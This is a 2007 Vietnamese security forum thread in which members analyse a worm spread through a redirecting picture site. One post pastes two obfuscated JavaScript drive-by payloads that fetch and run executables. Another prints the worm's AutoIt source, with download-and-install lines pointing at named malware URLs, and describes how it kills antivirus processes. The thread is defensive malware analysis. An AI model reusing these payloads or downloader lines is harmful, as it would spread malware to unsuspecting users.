English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Nhờ MOD test giùm con trong trang WEB thecoolpics.net !  XML
  [Question]   Nhờ MOD test giùm con trong trang WEB thecoolpics.net ! 26/07/2007 04:54:00 (+0700) | #1 | 73905
[Avatar]
 Bí Danh NJ
Member
[Minus]    0    [Plus]
Joined: 24/07/2007 07:38:21
Messages: 111
Location: Một nơi nào đó
Offline
[Profile] [PM] [Yahoo!]
Không biết thằng em mình nó mò cách nào vào đc cái trang :
http://thecoolpics.net/
nó tự chuyển đến trang này :
http://horse.he.net/~dynasty/albums/style/index.php
Trong đó có 2 con nhãy ra :
http://horse.he.net/~dynasty/albums/style/YMworm.exe
http://horse.he.net/~dynasty/albums/style/worm2007.exe
-------
Việc đầu tiên của nó là khóa Task Manager lại - Việc thứ 2 của nó ăn ra 2 file khác nhau trong SYSTEM32 có tên là svchoot.exe - Mình đã quyét sạch rồi mà vẫn còn ám ảm smilie - Các bạn test giùm mình con này với !
[Up] [Print Copy]
  [Question]   Nhờ MOD test giùm con trong trang WEB thecoolpics.net ! 26/07/2007 05:03:27 (+0700) | #2 | 73909
[Avatar]
 tmd
Member
[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Mod Hoàng xem cái trang bên trên có 2 đoạn code, dạng Mpack như lần trước không.
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('*75*8Hxhwnuy*75qfslzflj*8I*77%5BGXhwnuy*77*8J*5F*75*75*75*75ts*75jwwtw*75wjxzrj*75sj%7Dy*5F*75*75*75*75iq*75*8I*75*77myyu*8F44mtwxj3mj3sjy4*%3CJi%7Esfxy%7E4fqgzrx4xy%7Eqj4%5ER%7Ctwr3j%7Dj*77*5F*75*75*75*75Xjy*75ik*75*8I*75ithzrjsy3hwjfyjJqjrjsy*7%3D*77tgojhy*77*7%3E*5F*75*75*75*75ik3xjyFyywngzyj*75*77hqfxxni*77*7H*75*77hqxni*8FGI%3E%3BH%3A%3A%3B2%3B%3AF8266I52%3E%3D8F255H59KH7%3EJ8%3B*77*5F*75*75*75*75xyw*8I*77Rnhwtxtky3%5DRQMYYU*77*5F*75*75*75*75Xjy*75%7D*75*8I*75ik3HwjfyjTgojhy*7%3Dxyw*7H*77*77*7%3E*5F*75*75*75*75f6*8I*77Fit*77*5F*75*75*75*75f7*8I*77ig3*77*5F*75*75*75*75f8*8I*77Xyw*77*5F*75*75*75*75f9*8I*77jfr*77*5F*75*75*75*75xyw6*8If6*7%3Bf7*7%3Bf8*7%3Bf9*5F*75*75*75*75xyw%3A*8Ixyw6*5F*75*75*75*75xjy*75X*75*8I*75ik3hwjfyjtgojhy*7%3Dxyw%3A*7H*77*77*7%3E*5F*75*75*75*75X3y%7Euj*75*8I*756*5F*75*75*75*75xyw%3B*8I*77LJY*77*5F*75*75*75*75%7D3Tujs*75xyw%3B*7H*75iq*7H*75Kfqxj*5F*75*75*75*75%7D3Xjsi*5F*75*75*75*75ksfrj6*8I*77NJ%5DUQTWJ3J%5DJ*77*5F*75*75*75*75xjy*75K*75*8I*75ik3hwjfyjtgojhy*7%3D*77Xhwnuynsl3KnqjX%7ExyjrTgojhy*77*7H*77*77*7%3E*5F*75*75*75*75xjy*75yru*75*8I*75K3LjyXujhnfqKtqijw*7%3D7*7%3E*5F*75*75*75*75ksfrj6*8I*75K3GznqiUfym*7%3Dyru*7Hksfrj6*7%3E*5F*75*75*75*75X3tujs*5F*75*75*75*75X3%7Cwnyj*75%7D3wjxutsxjGti%7E*5F*75*75*75*75X3xf%7Bjytknqj*75ksfrj6*7H7*5F*75*75*75*75X3hqtxj*5F*75*75*75*75xjy*75V*75*8I*75ik3hwjfyjtgojhy*7%3D*77Xmjqq3Fuuqnhfynts*77*7H*77*77*7%3E*5F*75*75*75*75V3XmjqqJ%7Djhzyj*75ksfrj6*7H*77*77*7H*77*77*7H*77tujs*77*7H5*5F*75*75*75*75*8H4xhwnuy*8J*5F*5F*8Hxhwnuy*75qfslzflj*8I*77%5BGXhwnuy*77*8J*5F*75*75*75*75ts*75jwwtw*75wjxzrj*75sj%7Dy*5F*75*75*75*75iq*75*8I*75*77myyu*8F44mtwxj3mj3sjy4*%3CJi%7Esfxy%7E4fqgzrx4xy%7Eqj4%7Ctwr755%3C3j%7Dj*77*5F*75*75*75*75Xjy*75ik*75*8I*75ithzrjsy3hwjfyjJqjrjsy*7%3D*77tgojhy*77*7%3E*5F*75*75*75*75ik3xjyFyywngzyj*75*77hqfxxni*77*7H*75*77hqxni*8FGI%3E%3BH%3A%3A%3B2%3B%3AF8266I52%3E%3D8F255H59KH7%3EJ8%3B*77*5F*75*75*75*75xyw*8I*77Rnhwtxtky3%5DRQMYYU*77*5F*75*75*75*75Xjy*75%7D*75*8I*75ik3HwjfyjTgojhy*7%3Dxyw*7H*77*77*7%3E*5F*75*75*75*75f6*8I*77Fit*77*5F*75*75*75*75f7*8I*77ig3*77*5F*75*75*75*75f8*8I*77Xyw*77*5F*75*75*75*75f9*8I*77jfr*77*5F*75*75*75*75xyw6*8If6*7%3Bf7*7%3Bf8*7%3Bf9*5F*75*75*75*75xyw%3A*8Ixyw6*5F*75*75*75*75xjy*75X*75*8I*75ik3hwjfyjtgojhy*7%3Dxyw%3A*7H*77*77*7%3E*5F*75*75*75*75X3y%7Euj*75*8I*756*5F*75*75*75*75xyw%3B*8I*77LJY*77*5F*75*75*75*75%7D3Tujs*75xyw%3B*7H*75iq*7H*75Kfqxj*5F*75*75*75*75%7D3Xjsi*5F*75*75*75*75ksfrj6*8I*77J%5DUQTWJ3J%5DJ*77*5F*75*75*75*75xjy*75K*75*8I*75ik3hwjfyjtgojhy*7%3D*77Xhwnuynsl3KnqjX%7ExyjrTgojhy*77*7H*77*77*7%3E*5F*75*75*75*75xjy*75yru*75*8I*75K3LjyXujhnfqKtqijw*7%3D7*7%3E*5F*75*75*75*75ksfrj6*8I*75K3GznqiUfym*7%3Dyru*7Hksfrj6*7%3E*5F*75*75*75*75X3tujs*5F*75*75*75*75X3%7Cwnyj*75%7D3wjxutsxjGti%7E*5F*75*75*75*75X3xf%7Bjytknqj*75ksfrj6*7H7*5F*75*75*75*75X3hqtxj*5F*75*75*75*75xjy*75V*75*8I*75ik3hwjfyjtgojhy*7%3D*77Xmjqq3Fuuqnhfynts*77*7H*77*77*7%3E*5F*75*75*75*75V3XmjqqJ%7Djhzyj*75ksfrj6*7H*77*77*7H*77*77*7H*77tujs*77*7H5*5F*75*75*75*75*8H4xhwnuy*8J*5F5')</script>

<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631mbohvbhf%264E%2633kbwbtdsjqu%2633%2631uzqf%264E%2633ufyu0kbwbtdsjqu%2633%264F%261B%264D%2632..%261Bgvodujpo%2631qpqjuvq%2639vsm%263%3A%2631%268C%261B%261%3Aofxxjoepx%264Exjoepx/pqfo%2639vsm%263D%2638obnf%2638%263D%2638ifjhiu%264E311%263Dxjeui%264E261%263Dupq%264E911%2638%263%3A%264C%261B%261%3Ajg%2631%2639xjoepx/gpdvt%263%3A%2631%268Cofxxjoepx/gpdvt%2639%263%3A%268E%261B%261%3Asfuvso%2631gbmtf%264C%261B%268E%261Bqpqjuvq%2639%2633iuuq%264B00mbohohif/ofu%2633%263%3A%261B00%2631..%264F%261B%264D0tdsjqu%264F1')</script> 


Lần này nó thực thi thành công. Có 2 cái file dạng AutoIT.

PS: Edit lần 1, đúng là cái trang web này, bị hack bởi ai đó, và người này thêm thắt một chút. Để cái host của trang web này thành một chổ phát tán hàng độc. Hết biết.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Question]   Nhờ MOD test giùm con trong trang WEB thecoolpics.net ! 26/07/2007 05:11:53 (+0700) | #3 | 73912
[Avatar]
 Bí Danh NJ
Member
[Minus]    0    [Plus]
Joined: 24/07/2007 07:38:21
Messages: 111
Location: Một nơi nào đó
Offline
[Profile] [PM] [Yahoo!]
Nó ăn quá trời - Ăn cả IE - khóa trang chủ IE - gắn kết IE - ăn đến gần 200 cái khác nhau nên diệt cũng mệt nghỉ smilie( oa oa ! Ai chơi ác vậy trời !
[Up] [Print Copy]
  [Question]   Nhờ MOD test giùm con trong trang WEB thecoolpics.net ! 26/07/2007 05:18:21 (+0700) | #4 | 73913
[Avatar]
 tmd
Member
[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Sohanad, hay sohanat hay gì đó từ VIỆT NAM, do anh bạn bí danh NJ tự phát hiện, hoặc cố ý đưa lên đây cho anh em xem. smilie)
Nói vui vậy thôi, bạn thấy cái dòng link đó từ nơi nào vậy. Quả là Tác giả của Sohanat hay nad gì đó , đã sử dụng tới vũ khí mới là Mpack rồi , tui đoán mò vậy.

3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Question]   Nhờ MOD test giùm con trong trang WEB thecoolpics.net ! 26/07/2007 06:14:52 (+0700) | #5 | 73929
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Cái này không có dùng code của MPack mà chỉ dùng lại mấy cái code cũ thôi.
Trang này chứa 2 file, 1 file được viết bằng AutoIt, 1 được viết bằng VB 6.
Hoàng đặt tên cho worm này là TermeXBot.5/Worm/Win32 và TermeXBot.6/Worm/Win32. Ngoài ra, con này còn có tên gọi khác theo BKAV là Viet8x (theo Hoàng nghĩ vậy).
Sở dĩ có 2 cách gọi khác nhau là vì BKAV đặt theo tên của project viết bằng AutoIt (trích 1 phần mã từ con AutoIt ở trên):
Code:
; <AUT2EXE VERSION: 3.2.0.1>

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: H:\My Documents\Viet8x\YMworm.au3>
; ----------------------------------------------------------------------------

;---------------------------------------------------------------
; Tac Gia: TermeX - ThanatoS
; Phan Mem: TermeX Bot
; Phien Ban: 2.0
; Cong Dung: Quang cao Website thong qua Y!M,MSN,AIM,My Computer
; Phat Hanh: 20-9-2006
;---------------------------------------------------------------

Còn Hoàng đặt theo tên cách đặt tên project của tác giả smilie : TermeXBot.

Về cách tự bảo vệ của worm thì cũng dùng cách "cổ điển" thôi, set homepage, khoá task manager gì gì đó...

Cái trang trên không phải bị hack mà có lẽ do chính tác giả setup, vì trong mã nguồn dùng "hard code" cái đường link như sau:
Code:
; Lay Nhiem Vao He Thong
If Not FileExists(@WindowsDir & "\system\svchost.exe") Then
 		InetGet ("http://horse.he.net/~dynasty/albums/style/YMworm.exe", @WindowsDir & "\system\svchost.exe", 0, 1)
 		Sleep(5000)
	EndIf

If Not FileExists(@WindowsDir & "\system\svchost32.exe") Then
 		InetGet ("http://horse.he.net/~dynasty/albums/style/worm2007.exe", @WindowsDir & "\system\svchost32.exe", 0, 1)
 		Sleep(5000)
	EndIf

Kill các process: Bkav2006.exe, IEProt.exe, bdss.exe, vsserv.exe. (Chắc có lẽ không biết IE Protection khi xưa giờ đã đổi tên thành FastHelper hay sao mà vẫn giữ nguyên cái code cũ IEProt.exe smilie )

Tác giả của con này muốn kiếm tiền bằng cách phát tán con worm rồi cho nó tự click vào mấy cái online ads như Adbrite
Gởi ngẫu nhiên các tin nhắn vào Yahoo Messenger, AIM, Windows Explorer, My Computer và MSN (Live) Messenger

Rõ ràng thủ đoạn của malware writer ở Vietnam ngày càng tinh vi hơn và hướng vào mục đích tài chính chứ không còn chỉ để vui nữa smilie
[Up] [Print Copy]
  [Question]   Nhờ MOD test giùm con trong trang WEB thecoolpics.net ! 26/07/2007 06:27:54 (+0700) | #6 | 73932
[Avatar]
 Bí Danh NJ
Member
[Minus]    0    [Plus]
Joined: 24/07/2007 07:38:21
Messages: 111
Location: Một nơi nào đó
Offline
[Profile] [PM] [Yahoo!]
Thank MOD ! smilie) ! Máy nó nhiễm đâm ra nó chạy chậm quá ! Quét mãi mới xong - Vào lại thêm SAFE MODE quyét lần nữa cho chắc ăn - Vì đây là máy nhà của T.Anh (nhà ở Đà Nẵng) còn mình công tác ở Nha Trang nên lâu lâu về lại thấy cả ổ toàn loạn thế này smilie( Thank PRO ! Có con gì hay lại đưa lên cho PRO phân tích giùm smilie) hihi smilie) à nhân tiện MOD Hoàng dùng SOFT gì để phân tích mã thế - Có thể bày anh em tý ít đc ko ? hihi ?
[Up] [Print Copy]
  [Question]   Nhờ MOD test giùm con trong trang WEB thecoolpics.net ! 26/07/2007 07:09:35 (+0700) | #7 | 73945
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Nếu là AutoIt thì dùng AutoIt Decompiler (search trên google) là ra được code. Còn đối với VB hoặc các ngôn ngữ khác thì có thể dịch ra mã Assembly mà phân tích, bạn có thể tham khảo thêm IDA hay OllyDBG.
[Up] [Print Copy]
  [Question]   Re: Nhờ MOD test giùm con trong trang WEB thecoolpics.net ! 27/07/2007 00:19:41 (+0700) | #8 | 74073
quanlypho
Member
[Minus]    0    [Plus]
Joined: 01/07/2006 21:19:20
Messages: 95
Offline
[Profile] [PM]
btw, lần sau bạn có thể không cần lập topic mới mà nên post thẳng vào chủ đề "Nhận mẫu virus" của FastHelper:
/hvaonline/posts/list/9465.html

thân mến,
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|